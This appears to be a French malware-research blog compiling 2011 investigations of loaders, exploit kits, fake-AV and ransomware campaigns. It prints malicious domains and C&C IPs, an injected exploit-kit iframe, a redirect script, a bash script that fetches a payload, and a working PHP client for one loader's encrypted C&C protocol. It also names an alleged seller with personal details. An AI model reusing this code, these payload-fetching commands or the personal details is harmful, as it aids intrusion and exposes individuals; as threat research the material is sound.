MAD - Malware Analysis & Diagnostic

L'INVASION BLACKHOLE

Quelle est la particularité de ces DNS ?
CRLOEISIPPH.COM
ITAIEYMNOSHO.COM
RSICAIAOLPKE.COM
ORFMEOPEISGOA.COM
PMRPOPONAE.COM
SDHOPIACYYPO.COM
SSAMICEAOOPPB.COM
....

A chaque query, une IP différente => BlackHole.

Illustration, regardez bien la date et l'heure d'ajout sur Wepawet.
http://wepawet.iseclab.org/view.php?hash=2106ddd90a50d049586657db13531c20&t=1326542115&type=js
http://wepawet.iseclab.org/view.php?hash=74817acfe532558f8c35b9672870ed0b&t=1326542092&type=js
http://wepawet.iseclab.org/view.php?hash=c577e4d8b73bf53c67344cce3e53787b&t=1326542079&type=js
http://wepawet.iseclab.org/view.php?hash=9a13964995cd4389dc3d5dc875594ddf&t=1326542073&type=js
http://wepawet.iseclab.org/view.php?hash=4e527623e8a54163ad3b0e8b2a5507c6&t=1326542068&type=js
http://wepawet.iseclab.org/view.php?hash=67fa67786f5ca35531ade19d8c035d07&t=1326542063&type=js
http://wepawet.iseclab.org/view.php?hash=380582a301361d3668db686db8b3e219&t=1326542058&type=js
http://wepawet.iseclab.org/view.php?hash=7031f5233bb47c4bd3e795c181bc071c&t=1326542033&type=js
...

D'après les NS, on distingue 2 IPs:

- http://bgp.he.net/ip/66.199.246.34
In country: United States
In region: NY New York
In city: New York
Postal code: 10004
Latitude: 40.6888
Longitude: -74.0203
Metro code: 501
Area code: 212

Name: Access Integrated Technologies, Inc.
Company: AccessIT - Managed & Hosting Services
Street: 11 Broadway
Suite 1131
City: New York
State/Province: NY
Postal Code: 10004
Country: US
Registration Date: 1999-02-16
Last Updated: 2011-11-25
Phone: +1-646-375-3379 (Office)
+1-631-961-0500 (Fax)
Email: adhoon@accessitx.com

- http://bgp.he.net/ip/209.239.112.146
In country: United States
In region: MO Missouri
In city: Saint Louis
Postal code: 63101
Latitude: 38.6312
Longitude: -90.1922
Metro code: 609
Area code: 314

Company: Hosting Solutions International, Inc.
Street: 710 North Tucker Blvd.
Suite 400a
City: St. Louis
State/Province: MO
Postal Code: 63101
Country: US
Registration Date: 2003-04-14
Last Updated: 2010-06-24
Phone: +1-314-266-3638 (Office)
Email: abuse@hostingsolutionsint.com

Les plus anciens domaines répertoriés ont été enregistrés fin décembre 2011.
D'autres, une minorité, à la date du 17 novembre 2011.

SKY-LOADER - A NON-RESIDENT DOWNLOADING SYSTEM

L'usage de System of Load perdure mais nous avons identifié un petit nouveau.

Le PE (exemple: IRS.GOV_FORM_09252011...) stocké dans le fichier ZIP fait ~40,6 Ko
Diverses layers protègent le malware original des détections (VT: 3/44)
En réalité, la taille du downloader est petite, seulement 6 Ko

[+] http://anubis.iseclab.org/?action=result&task_id=149b8ab034457904475543fd3c080557f

Fichiers en ligne:
- http://dimarixi.ru/imgas/build.exe
- http://dimarixi.ru/imgas/light.exe
- http://dimarixi.ru/imgas/client.exe

Configuration exacte:
1 ; US ; 84 ; 79 ; 80 ; 56 ; http://dimarixi.ru/imgas/light.exe
2 ; AU ; 5 ; 5 ; 5 ; 1 ; http://dimarixi.ru/imgas/light.exe
3 ; AC ; 142 ; 108 ; 92 ; 91 ; http://dimarixi.ru/imgas/build.exe

Configuration actuelle:
1 ; US ; 218 ; 212 ; 200 ; 166 ; http://aleuola.ru/new/light.exe
2 ; AU ; 4 ; 4 ; 4 ; 0 ; http://aleuola.ru/new/light.exe
3 ; AC ; 670 ; 625 ; 592 ; 530 ; http://aleuola.ru/new/build.exe

nb: Les mêmes menaces que les campagnes précédentes.

Panneau d'administration SKY-Loader v.1.2
- http://dimarixi.ru/images/admin.php

DNS: DIMARIXI.RU (46.108.225.73 :: AS50244)
nserver: dns1.naunet.ru
nserver: dns2.naunet.ru
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
e-mail: mxx3@yandex.ru
registrar: NAUNET-REG-RIPN
created: 2011.08.28
paid-till: 2012.08.28
source: TCI

nb: La même IP (46.108.225.73) avait été utilisée pour RUSSIANTRAFF.RU

- Annonce du vendeur
Ci-dessous la version texte traduite en anglais:
- http://cyb3rsleuth.blogspot.com/2011/08/sky-loader.html
Les captures de l'interface:

Seller/Coder: Rev0Lt aka revolt-s aka ReVolTAki aka ReVolTaK1
RealName: Максим (Maxim) a 18 ans, il est né le 23 juin 1993, habite en Russie dans une ville de Sibérie nommée http://en.wikipedia.org/wiki/Krasnoyarsk. Administre des serveurs de jeux tels que Counter-Strike.

nb: E-mail pour l'enregistrement DNS (C&C), mxx3@yandex.ru, même que:
05-2010 -- 193.105.174.108 -- HULEJSOOPS.RU -- Oficla/Sasfis C&C
05-2010 -- 59.53.91.192 -- OOMSEEKERSS.RU -- Zeus v2
05-2010 -- 89.187.45.46 -- LOLOOHUILDIFSD.RU -- Zeus v2
05-2010 -- 89.187.45.46 -- NEMOHUILDIFSD.RU -- Zeus v2
05-2010 -- 89.187.45.46 -- NEMOHUILDIIN.RU -- Zeus v2
05-2010 -- 89.187.45.46 -- RUSSIANMOMDS.RU -- Zeus v2
* ref: http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RBN_Observations_2nd_Quarter_2010.txt

Liens connexes:
Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign
- http://ddanchev.blogspot.com/2010/07/dissecting-xerox-workcentre-pro-scanned.html

SYSTEM OF LOAD 2.X - INVESTIGATIONS (SUITE)

A la racine des serveurs, il y a 3 répertoires:
- Un dossier pour les fichiers cryptés.
- Un dossier pour la communication et l'administration C&C
- Un dossier pour le stockage des données dérobées

La structure de la base de données est la suivante:

Ci-dessous, une capture d'écran du panneau d'administration.

Exemple d'informations précises relatives à ces C&C.

-- 178.79.174.230 --

66.27.202.10

cpe-66-27-202-10.socal.res.rr.com

109.232.229.43

-- 178.79.164.126 --

98.234.97.36

c-98-234-97-36.hsd1.ca.comcast.net

109.232.229.43

-- 173.255.198.164 --

98.234.97.36

c-98-234-97-36.hsd1.ca.comcast.net

109.232.229.43

Intéressant, hein ^_o ?

Si éventuellement des personnes que NOUS suivons via Twitter sont intéressées pour étudier de plus près les codes sources
de ce kit ET/OU d'autres informations pour étoffer leurs investigations: qu'elles se manifestent en DM - toutes autres demandes seront rejetées.

Liens connexes:

▸ 15/08/2011 - A wild malware rollercoaster – over 500% increase (Avi Turiel)
http://blog.commtouch.com/cafe/malware/a-wild-malware-rollercoaster-%E2%80%93-over-500-increase/

▸ 16/08/2011 - Massive Rise in Malicious Spam (Rodel Mendrez)
http://labs.m86security.com/2011/08/massive-rise-in-malicious-spam/

▸ 16/08/2011 - Fake AV Propels Visa Card Scams (Arun Pradeep)
http://blogs.mcafee.com/mcafee-labs/fake-av-propels-visa-card-scams

▸ 17/08/2011 - Pushdo/Cutwail/Webwail Botnet Resurrects (Kyle Yang)
http://re-malware.com/?p=456

▸ 17/08/2011 - New York City "Uniform Traffic Ticket" tops spammed malware (Gary Warner)
http://garwarner.blogspot.com/2011/08/new-york-city-uniform-traffic-ticket.html

▸ 18/08/2011 - Inter-company invoice emails carry malware (Graham Cluley)
http://nakedsecurity.sophos.com/2011/08/18/inter-company-invoice-emails-malware/

▸ 18/08/2011 - Bots resurrected - malicious spam on the rise. (Amon Sanniez)
http://community.websense.com/blogs/securitylabs/archive/2011/08/18/bot-s-resurrected-malicious-spam-on-the-rise.aspx

▸ 18/08/2011 - Email malware levels skyrocket (Avi Turiel)
http://blog.commtouch.com/cafe/antivirus/email-malware-levels-skyrocket/

PID LOADER

Les campagnes continuent avec l'une baptisée changelog et l'autre * Corp.
Même recette sauf qu'ils utilisent en plus une astuce pour le nom du fichier zippé.
Cette technique est parfaitement expliquée et illustrée:
‣ http://norman.com/security_center/security_center_archive/2011/rtlo_unicode_hole/

Pour renforcer l'illusion d'un ".doc", l'icône du programme est celui des fichiers Word.

Les API et les chaines sont xorées (ici 0x02).
Ici, les DNS sont ARMATURAN.RU et RUSSIANTRAFF.RU (94.199.48.152:80/TCP)

Donc nous avons une première requête.

GET /forum/dl/ots.php?seller=4&hash={00000000-0000-0000-0000-000000000000} HTTP/ 1.0
User-agent: GoogleBot

Retourne un message <TITLE>404 Not Found</TITLE> ...
Mais si on regarde de plus près, il ne s'agit pas d'un 404 mais d'un 200.
De plus, à la fin du message il y a une ligne discrète mais interessante:

<div style="visibility:hidden;" id ="knocktime">||15||||||</div>

Une fois le hash ajouté à la base, une deuxième requête est effectuée.

GET /forum/dl/getapp.php?seller=4&hash={00000000-0000-0000-0000-000000000000} HTTP/ 1.0
User-agent: GoogleBot

La réponse contient les instructions:

||fbd4c632a0dc8fafc0f43fa7aee17e64||http://www.baletour.at/Bilder/Zeitung/build.exe||0||0||5e9nK9Ns.exe||<br>

Ce serveur était piraté, il y avait 3 fichiers:
- www.baletour.at/Bilder/Zeitung/build.exe (19da2f841a431d80bebfce7ab112ac0a)
- www.baletour.at/Bilder/Zeitung/light.exe (4b72404c9392ea034538a88aadd97321)
- www.baletour.at/Bilder/Zeitung/client.exe (8ed68a129b3634320780719abf6635cc)

build est SpyEye ; il y a suffisamment d'informations sur le sujet.

light est un stealer, il communique avec le C&C (221.132.34.164:443/TCP)
User-agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- https://ledinit.ru/car/index.php
- https://remonit.ru/car/index.php
- https://muvinor.ru/car/index.php
- https://pecoran.ru/car/index.php

client communique avec le C&C (46.37.184.90:80/TCP) et télécharge un driver.
User-agent: Mozilla/ 4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Conclusion: on retrouve le même type de téléchargements qu'avec System of Load sauf qu'ici il s'agit de PID Loader. Outil que nous avions déjà observé lors de la distribution des pusk*.exe

edit: GarWarner vient de publier ses observations.

Liens connexes:

▸ 10/08/2011 - http://garwarner.blogspot.com/2011/08/inter-company-invoice-spam-leads-to.html

SYSTEM OF LOAD 2.X - TROJANDOWNLOADER:WIN32/RAZLE.A

Depuis quelques temps, nos BAL sont remplies d'e-mails du type:
- Your credit card is blocked
- Your credit card has been blocked
- DHL DELIVERY CONFIRMATION %d
- DHL ATTENTION %d
- FedEx id. %d
- Fed Ex DELIVERY CONFIRMATION %d
- FedEx Delivery Confirmation %d
- SUMMER-2011: HOT PLACES OF BABIES
- KNOW-HOW: BABESPOTS IN WORLD
- KNOW-HOW: LOVE BABE PLACES
...

Des campagnes de spams similaires ont déjà été observées à plusieurs reprises (GarWarner)
- FedEx / DHL
- Visa / MasterCard
- Love Card
...

A chaque fois, un fichier au format ZIP accompagne les e-mails.
Les noms des fichiers sont de tailles variables et composés de minuscule(s) ET/OU majuscule(s) ET chiffre(s).
La composition des noms du fichier dans l'archive ressemble à:

☢ ID_N%d.doc________________.exe
☢ DHL_invoce_NR%d.doc________________.exe
☢ fedex_invoce_id%d.doc_____________.exe
☢ Map_of_Love_NR%d.doc_____________.exe
...

Ce PE est généralement compressé UPX et il y a quelque chose d'assez interessant à noter.

La décompression statique avec l'utilitaire UPX va retourner un binaire corrompu.
La même chose risque de se produire avec des outils de dump automatisés.

Le fichier packé contient une couche protectrice avec les tricks habituels d'anti-VM.
Une lecture d'HKLM\HARDWARE\DESCRIPTION\System\VideoBiosVersion suivie d'une comparaison sur la chaine VIRTUALBOX pour détecter l'environnement. De même sur l'appel DeviceIoControl avec IoControlCode à 0x2D1400. Des comparaisons s'effectuent avec les chaines QEMU, VMWARE, VBOX, VIRTUAL, WARE, ARRAY ainsi qu'avec QM00001 et 00000000000000000001. Le fichier exécuté ne doit pas être nommé SAMPLE, VX ou VIRUS. Parcours des processus existants à la recherche d'outils (ex: wireshark) et recherche un module chargé nommé SbieDll.dll (qui correspond à sandboxie). Enfin le code est décompressé (RtlDecompressBuffer) et un processus svchost.exe est alors créé puis patché en mémoire (WriteProcessMemory).

Ce programme va contacter un serveur pour récupérer la dernière configuration puis télécharger les différents composants.
Les communications avec le C&C se font en méthodes POST et les données sont chiffrées.

POST /path/index.php HTTP/1.1

Content-Type: multipart/form-data; boundary=0

Host: xxx.xxx.xxx.xxxx

Connection: close

Cache-Control: no-cache

Content-Length: %d



--0

Content-Disposition: form-data; name="data"; filename="%d"

Content-Type: application/octet-stream



$B64($RC4(%s)))

--0--

[!] Chaque C&C dispose de sa propre clé RC4 ; hardcodée dans le loader.

Les informations envoyées:
La variable ver correspond à la version du loader.
La variable os indique le code du système d'exploitation.
L'idx retourne l'identifiant du client.
Si ctl a pour valeur 142 ça signifie proverka et $data sera forcément à (null)
Si ctl a 264 ça signifie otchet et $data va servir de feedback sur les exécutions.

Exemples:
ver=0.0.0.1&os=7601&idx=1329932721&ctl=142&data=(null)
ver=0.0.0.1&os=7601&idx=1329932721&ctl=264&data=826262783-0|705603642-0|701474623-2|

Le serveur retourne alors de manière chiffrée la liste des tâches à effectuer.
Il y aura l'URL du payload chiffré à télécharger, déchiffrer et exécuter. Les - servent de séparateurs.
Un 0 ou un 1 correspond au type d'exécution : écrire un fichier (ex: %APPDATA%) ou directement en mémoire
Il y aura une clé unique pour déchiffrer chaque fichier.
Et enfin une valeur fixe ajoutée automatiquement en fin d'instructions, propre au C&C.

Ayant les données nécessaires, nous pouvons dialoguer et coder un tracker en PHP à l'aide de phpseclib.
http://phpseclib.svn.sourceforge.net/viewvc/phpseclib/trunk/phpseclib/Crypt/RC4.php?view=markup
Ci-dessous, un simple exemple permettant de télécharger et déchiffrer la configuration.

<?php

  $s="178.79.174.230"; // server

  $p="/lwoi/index.php"; // path

  $k="783C5351-9D0D-4827-86AF-003600E07D5A-DA2F25F4-5F7B-4166-88A1-0309F77A3985"; // key

  include_once('rc4.php'); $rc4=new Crypt_RC4(); $rc4->setKey($k); // init RC4

  $c=base64_encode($rc4->encrypt("ver=1.3.3.7&os=2600&idx=2130706433&ctl=142&data=(null)\r\n"));

  $f="--0\r\nContent-Disposition: form-data; name=\"data\"; filename=\"2130706433\"";

  $f.="\r\nContent-Type: application/octet-stream\r\n\r\n".$c."\r\n--0--";

  $h=array("POST ".$p." HTTP/1.1","Content-Type: multipart/form-data; boundary=0",

  "Cache-Control: no-cache","Content-length: ".strlen($f));

  $ch=curl_init();

  curl_setopt($ch,CURLOPT_URL,"http://".$s.$p);

  curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

  curl_setopt($ch,CURLOPT_TIMEOUT,30);

  curl_setopt($ch,CURLOPT_HTTPHEADER,$h);

  curl_setopt($ch,CURLOPT_USERAGENT,"");

  curl_setopt($ch,CURLOPT_POST,1);

  curl_setopt($ch,CURLOPT_POSTFIELDS,$f);

  $d=curl_exec($ch);

  if(curl_errno($ch)) {

    echo curl_error($ch);

  } else {

    echo $rc4->decrypt(base64_decode($d));

        curl_close($ch);

  }

?>

Ce qui retourne quelque chose comme..

http://178.79.174.230/bau/rioqjder

6f569674-e222-46c3-ac67-493524cfa67d

http://178.79.174.230/bau/opalkr

f1634da1-3423-4496-acdb-51e97e719449

http://178.79.174.230/bau/oq09di39tujty5g

f3cbbf8e-cd76-4e45-b19e-91ed7c5fbb7e

Fichiers qui pourront être déchiffrés à peu près de la même manière à l'aide de leurs clés respectives.

Voici différents payload observés ces dernières heures:
- http://178.79.174.230/bau/doqwet (08-Aug-2011 05:29 - 376K)
- http://178.79.174.230/bau/wlioijgt (08-Aug-2011 05:31 - 78K)
- http://178.79.174.230/bau/opalkr (08-Aug-2011 10:40 - 44K)

* doqwet mène à l'installation d'un Fake AV.
L'objectif est de simuler de fausses erreurs/pannes pour que l'utilisateur agacé paye le faux produit.

* wlioijgt va se charger d'aspirer les identifiants de vos comptes stockés dans des logiciels tels que les clients FTP.
Ce redoutable password stealer fonctionne avec WINSCP2, FlashFXP, SmartFTP, FileZilla, CuteFTP, FTPCommanderDeluxe, TotalCommander, ...
Les données volées sont chiffrées puis réccupérées soit pour les exploiter soit pour les revendre par lots au plus offrant.

* opalkr va s'exécuter en mémoire, il utilise le chargeur générique et configurable que nous venons de détailler.
Il va se connecter au C&C puis télécharger: http://202.190.179.117/Yy7zQa1O/QQ18BY5SqoMlp945D
Qui sera enregistré puis déchiffré sous %WINDIR%\SYSTEM32\DRIVERS\%random%.sys
Ce composant est très mal détecté à l'heure actuelle.

Ces zombies (agents) continuent d'informer les C&C et reste disponibles dans l'attende d'ordres.

System of load 2.x
ɣ C&C Panel :: http://xxx.xxx.xxx.xxx/path/adm/menu.php

Les cybercriminels peuvent en temps réel visualiser et trier les machines infectées grâce aux statistiques.

La gestion des tâches est très simple ce qui permet de réagir rapidement et de s'adapter aux besoins du moment.
La fonction d'exécution en mémoire est intéressante pour l'installation de composants et pour les upgrade C&C.
Ils ont aussi la possibilité de limiter la distribution d'une charge à certains clients (ex: par pays, OS,..).
Ainsi ils peuvent répartir les ressources, rester plus discrets, et surtout.. mieux résister aux décapitations.
Les échanges chiffrés sont un bon moyen de passer à travers certaines protections et ralentir des investigations.

Du temps et de l'argent pour spammer la Terre entière... ça doit être une affaire rentable :]=~

Liens connexes:

▸ 23/07/2011 - MasterCard Spam Leads to Fake AV (Gary Warner)
http://garwarner.blogspot.com/2011/07/mastercard-spam-leads-to-fake-av.html

▸ 03/08/2011 - Love Map Spam spreads Fake AV (Gary Warner)
http://garwarner.blogspot.com/2011/08/love-map-spam-spreads-fake-av.html

GEEK.COM DIFFUSE DES EXPLOITS

<iframe src="http://1175.eachdomain.in/?n=1175" width=1 height=1 frameborder=0></iframe>

Il s'agit d'un Phoenix Exploit Kit.
-- http://wepawet.iseclab.org/view.php?type=js&hash=553ee416dff9e75a88a660f08020f3e5&t=1305469390

Payload: http://1175.eachdomain.in/xmb.php?i=10
MD5: 927994bf8f9c8e8af04f69baea47d3ee
SHA-1: 1d27d05ba5cea74ba1473162a975f10da7f75795

EACHDOMAIN.IN

173.212.204.50

Au moment de l'incident, nous avons eu des constatations différentes.
La présence d'un Phoenix Exploit Kit tandis que Zscaler avait un Incognito Exploit Kit.

Liens connexes:
[+] Geek.com hacked with an exploit kit
http://research.zscaler.com/2011/05/geekcom-hacked-with-exploit-kit.html

[+] The Rise Of Incognito
http://blog.fireeye.com/research/2011/03/the-rise-of-incognito.html

[+] Incognito Exploit Kit
http://www.kahusecurity.com/2011/incognito-exploit-kit

[+] Exploit Kits as a Service
http://blog.seculert.com/2011/03/exploit-kits-as-service.html

STATISTIQUES SUR LA CAMPAGNE D'EXPLOITATION DU CVE-2010-1885

Informations additionnelles au billet de Mike Geide publié sur zscaler.

[+] 233 machines infectées / minute
[+] 14 081 / machine infectées / heure
Un 1/2 million de machines infectées depuis le début de la campagne ?
Prudence avec certaines de ces statistiques, notamment celles de g01pack ^_o

Statistics Don’t Lie… Or Do They?
http://blog.tllod.com/2010/11/03/statistics-dont-lie-or-do-they/

Mass Injections Leading to g01pack Exploit Kit
http://community.websense.com/blogs/securitylabs/archive/2011/04/19/Mass-Injections-Leading-to-g01pack-Exploit-Kit.aspx

An Overview of Exploit Packs (Update 10) May 8, 2011
http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html

Help Center URL Validation Vulnerability (CVE-2010-1885) Campaign
http://research.zscaler.com/2011/05/help-center-url-validation.html

DON'T CHECK FILES IN PUBLIC SCANNERS ? :)

Serveurs:
х 46.252.130.123
х 46.252.130.124
х 46.252.130.125
х 46.252.130.126
х 91.200.240.70
х 91.200.240.71
х 91.200.240.72
х 91.200.240.73
х 91.200.240.74
х 91.213.29.139
х 91.213.29.140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />

<title>Statistic-1</title>

<link rel="stylesheet" href="css/style.CSS" type="text/css" media="screen" />

<link rel="stylesheet" href="css/enter.CSS" type="text/css" media="screen" />

</head>

<body>

<div id="align">

<div id="conteiner"><form method="post">

<div id="enter">

  <span><p>Login:</p><input name="login" type="text" value="" /></span>

  <span><p>Password:</p><input name="pass" type="password" value="" /></span>

  <span><input name="enter" type="submit" value="Enter" class="enter" /></span>

</div>

</form></div>

</div>

</body>

</html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />

<title>Статистика трафика</title>

<link rel="stylesheet" href="css/style.CSS" type="text/css" media="screen" />

<link rel="stylesheet" href="css/traffic.CSS" type="text/css" media="screen" />

</head>

<body>

<div id="align">

<div id="conteiner"></div>

</div>

</body>

</html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />

<title>ID:1</title>

<link rel="stylesheet" href="css/style.CSS" type="text/css" media="screen" />

<link rel="stylesheet" href="css/index.CSS" type="text/css" media="screen" />

<script type="text/javascript" language="JavaScript" src="js/jquery.js"></script>

<script type="text/javascript" language="JavaScript" src="js/function.js"></script>

</head>

<body>

<div id="align">

<div id="conteiner"><div id="scan">

<b>ID: 1</b>

  <div id="block">

    <div id="str">Updated manually only (don't hotlink anywhere!)</div>

    <span>

      <p>Crypted:</p>

      <div class="in">http://r-file.su/data1/setup1.exe</div>

      <div class="scan" onclick="Scan(1);">Scan</div>

    </span>

    

  </div>

  <div id="block">

    <div id="str">Don't check files in public scanners such as Virustotal!</div>

    <span>

      <p>Without crypt:</p>

      <div class="in">http://r-file.su/data1/no-crypt/setup1.exe</div>

      <br /><a href="http://r-support.su/webim/client.php?locale=en"><b>Online support</b></a><br />

    </span>

  </div>

    </div>

<div id="out"></div>

</div>

</div>

</body>

</html>

<tpl>

 <url>google.$ZONE6$/*&q=$KEY6$&*</url>

 <present>*\x3c/ol\*</present>

 <find>\\x3ca id\\x3dan$B6$href\\x3d\\x22$CLICKURL6$\x3e$TITLE6$/a\\x3e*50\\x3c/h3\\x3e$DES6$cite\\x3e$URL6$/cite\\x3e*</find>

 <ext>r-ads.info/a.php?flg=ggl_ad_right_inst&flg_int=6&q=#KEY6#&z=#ZONE6#</ext>

 <post>url=#URL6#&clickurl=#CLICKURL6#&title=#TITLE6#&des=#DES6#&b6=#B6#</post>

 <replace>\\x3ca id\\x3dan#NEWB6#href\\x3d\\x22#NEWSCRIPT#\\x22\\x3e#NEWTITLE#/a\\x3e\\x3c/h3\\x3e#NEWDES#cite\\x3e#NEWURL#/cite\\x3e#NEWRESULT#</replace>

 <tag>6</tag>

</tpl>

<tpl>

 <url>$ZONE7$search.yahoo.*&p=$KEY7$&*</url>

 <find><a class="yschttl spt"*7href="$CLICKURL7$">$TITLE7$</a></h3>*</div>$B7$div class="abstr"*15>$DES7$</div$B7_1$span class=url>$URL7$</span>*</find>

 <find><a class="yschttl spt"*7href="$CLICKURL7$">$TITLE7$</a></h3>*</div>$B7$div class="sm-abs"*15>$DES7$</div$B7_1$span class=url>$URL7$</span>*</find>

 <ext>r-ads.info/a.php?flg=yho_se_main&flg_int=7&q=#KEY7#&z=#ZONE7#</ext>

 <post>url=#URL7#&clickurl=#CLICKURL7#&title=#TITLE7#&des=#DES7#&b7=#B7#&b7_1=#B7_1#</post>

 <replace><a class="yschttl spt" href="#NEWSCRIPT#">#NEWTITLE#</a></h3></div>#NEWB7#div class="abstr">#NEWDES#</div#NEWB7_1#span class=url>#NEWURL#</span></replace>

 <tag>7</tag>

</tpl>

<tpl>

 <url>bing.*&q=$KEY11$&*</url>

 <find><DIV class=*2sb_tlst*2>*7<H3><A*90href="http://$CLICKURL11$">$TITLE11$</A></H3>$B11$<P>$DES11$</P>*7<DIV*10class=*2sb_meta*2><CITE>$URL11$</CITE>*</find>

 <find><div class=*2sb_tlst*2><h3><a href="http://$CLICKURL11$">$TITLE11$</a></h3></div>$B11$<p>$DES11$</p><div*class=*2sb_meta*2><cite>$URL11$</cite>*</find>

 <find><DIV class=*2sb_tlst*2><H3><A href="http://$CLICKURL11$">$TITLE11$</A></H3></DIV>$B11$<P>$DES11$</P><DIV*class=*2sb_meta*2><CITE>$URL11$</CITE>*</find>

 <ext>r-ads.info/a.php?flg=bng_se_main&flg_int=11&q=#KEY11#</ext>

 <post>url=#URL11#&clickurl=#CLICKURL11#&title=#TITLE11#&des=#DES11#&b11=#B11#</post>

 <replace><div class="sb_tlst"><h3><a href="#NEWSCRIPT#">#NEWTITLE#</a></h3></div><p>#NEWDES#</p><div class="sb_meta"><cite>#NEWURL#</cite></replace>

 <tag>11</tag>

</tpl>

<page>

  <url>#NEWCLICKURL#</url>

  <header>HTTP/1.1 302 Found

Location: http://#NEWREALURL#</header>

</page>

<req>

  <url>#NEWREALURL#</url>

  <data>Referer: #NEWREF#</data>

</req>

<tpl>

 <url>google.*&q=$KEY100$&*</url>

 <find><style>$#center_col{min-width:*4px}</style>*</find>

 <replace> </replace>

 <tag>100</tag>

</tpl>

<upd>

  <ext>updateconnection.com/a/getupdate.php?id1=#ID1#&id2=#ID2#&guid=#GUID#&ver=#VER#&dom=#DATEDOM#</ext>

  <period>180</period>

  <seed>fref312e</seed>

</upd>

91.200.240.72, 46.252.130.124, 194.28.44.217
WINUPDATESERVER.SU (46.252.130.124)
WINDRIVERUPDATE.KZ (91.200.240.70)
WINUPDATESERVICES.COM (91.200.240.72)
SOFTWAREUPDATESERVICE.RU (91.200.240.72)
UPDATESERVERS.KZ (91.200.240.72)
UPDATECONNECTION.COM (91.213.29.139)
CLOUDNANOCONNNECTION.INFO (91.213.29.139)
R-PANEL.SU (91.213.29.139)
R-FILE.SU (91.213.29.139)
P-FILE.SU (91.213.29.139)
R-SUPPORT.SU (46.182.104.13)

RICH-PARTNERS.COM (62.212.66.104)
R-ADS.INFO (85.17.216.105)
? (184.154.5.202)

Exemple: http://r-ads.info/a.php?flg=ggl_se_main&flg_int=2&q=movie

Pour améliorer les détections, les éditeurs AV trouveront plusieurs milliers de PE compressés.

#!/bin/bash

cd /var/www/html/file/tmp_exe

rm *.zip -f

wget http://184.154.5.202/setup_crp.zip -O setup_crp.zip

unzip setup_crp.zip

mv -f /var/www/html/file/tmp_exe/*.exe /var/www/html/file/

Enfin, voici les premières entrées des database.
܃܃܃ http://r-panel.su/c/dump/mysql.dump

213.229.84.96

92.244.236.178

Exemple d'annonces diffusées sur des boards.

Historique des news.

414726216

Fuze@thesecure.biz

915678

[RP]Rich-Support@thesecure.biz

603416411

rich@thesecure.biz

Interface de l'account

DIE OFFIZIELLE MITTEILUNG DER BUNDESKRIMINALAMT

Ce matin, une étrange charge utile distribuée par un kit Incognito à été découverte.
Le fichier setup.exe 759814715bd51cdd5891ed76b312a1dd2706dd6c fait 82 016 octets.
Packé UPX, il renferme un stub écrit en VisualBasic + une deuxième couche UPX.
D:\Work\test\march\sol1\Summer_Generated-1\DJdorHc.vbp

Le PE de 94 208 octets (7fda7d826832f121e210e608c894172ccc5c4799) est écrit à l'aide de VC++

En plein écran s'affiche la demande de rançon.

Voici les ressources:

Achtung!

Ein Vorgang illegaler Aktivitaten wurde erkannt. Das Betriebssystem wurde im Zusammenhang mit Verstossen gegen die Gesetze der Bundesrepublik Deutschland gesperrt!

Auf Ihrem Computer wurden ebenfalls Videodateien mit pornografischen Inhalten, Elementen von Gewalt und Kinderpornografie festgestellt! Es wurden auch Emails in Form von Spam, mit terroristischen Hintergründen, verschickt.

100 Euro

bundeskriminalamtes@yahoo.com

Le code HTML embarqué.

Ici, le DNS est hors-service. Tout le problème d'hardcoder les données...
Vous noterez que ce template ressemble à celui du takedown de Bredolab.

Liens connexes:
-- Exploit Kits as a Service
http://blog.seculert.com/2011/03/exploit-kits-as-service.html
-- Japan Quake Spam leads to Malware (Part 1,2,3)
http://www.securelist.com/en/blog/6123/Japan_Quake_Spam_leads_to_Malware_Part_3
-- Ransomware: Fake Federal German Police (BKA) notice
http://www.securelist.com/en/blog/6155/Ransomware_Fake_Federal_German_Police_BKA_notice
-- The Rise of Incognito
http://blog.fireeye.com/research/2011/03/the-rise-of-incognito.html

SYSTEMTOOL

Des sites comme celui détaillé plus bas, il en existe des centaines.
Les mots clés employés sont souvent calqués aux tendances (trends)
Keywords: https://encrypted.google.com/search?q=site:dhivote.com&filter=0&num=100

chevrolet-cruze-black

chevrolet

<script>

document.write('<div style="position: absolute; top: 0; left: 0; width: 100%;  height: 100%;  background-color: #FFFFFF; padding: 0px"></div>');

document.write("<img src='//counter.yadro.ru/hit;newtraffic?t45.6;r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random()+"' border='0' width='0' height='0'>");

var url = "http://46.252.134.5/t/";

function goToGoogle() {

if (window!=top) {top.location.href = url;} else document.location= url;

}

  window.setTimeout(goToGoogle, 500);

</script>

Schématiquement:
sutra://46.252.134.6/in.cgi?3
--> crew://wolandtraffic.com/default.cgi
Linux main 2.6.18-194.32.1.el5PAE #1 SMP
Wed Jan 5 18:43:13 EST 2011 i686 i686 i386 GNU/Linux
/home/clients/woland/domains/wolandtraffic.com/html
uid=501(account) gid=501(account) groups=10(wheel),501(account)

redir://46.252.134.8/
sutra://46.252.134.6/in.cgi?2
--> exploit://71.6.221.90/TF19
--> payload://71.6.221.90/1TF19jb

redir://46.252.134.5/t/
--> exploit://71.6.221.90/TF19
--> payload://71.6.221.90/1TF19jb

script://46.252.134.5/fast-scan/
--> payload://46.252.134.9/BestAntivirus2011.exe

